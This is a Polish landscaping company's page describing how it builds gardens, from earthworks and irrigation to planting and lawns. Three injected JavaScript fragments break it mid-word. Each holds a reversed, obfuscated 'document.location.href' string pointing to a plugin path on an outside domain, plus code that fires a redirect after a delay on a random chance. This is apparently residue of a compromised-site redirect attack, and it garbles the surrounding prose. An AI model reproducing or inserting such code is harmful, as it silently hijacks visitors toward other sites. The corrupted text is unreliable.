Zatwierdzony projekt techniczny przenoszony jest z kartki na rzeczywisty urządzany teren. Pierwszy etap toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to prace ziemne, mające na celu użyźnienie gleby, zaopatrzenie w składniki pokarmowe, ukształtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie terenu. Następnie wyznaczamy rabaty, ciągi komunikacyjne, place zabaw. Następnym etapem jest instalacja wymaganych systemów nawadniających i oświetlenia.

Po zakończeniu prac instalacyjnych i wcześniejszym rozłożeniu agrowłókniny na rabatach, przystępujemy do sadzenia roślinności zgodnie z wcześniej ustalonym planem. Rabaty wypełniamy korą lub grysem. Ostatnim etapem realizacji prac jest zakładanie trawnika. Po zakończeniu prac nowe nasadzenia i trawniki wstępnie pielęgnujemy i nawozimy.

Aby świadczyć Państwu usługi na najwyższym poziomie systematycznie poszerzamy naszą wiedzę z zakresu nowinek technicznych i technologii wprowadzanych w ogrodnictwie. Do budowy ogrodów stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosujemy naturalne materiały o najwyższej jakości.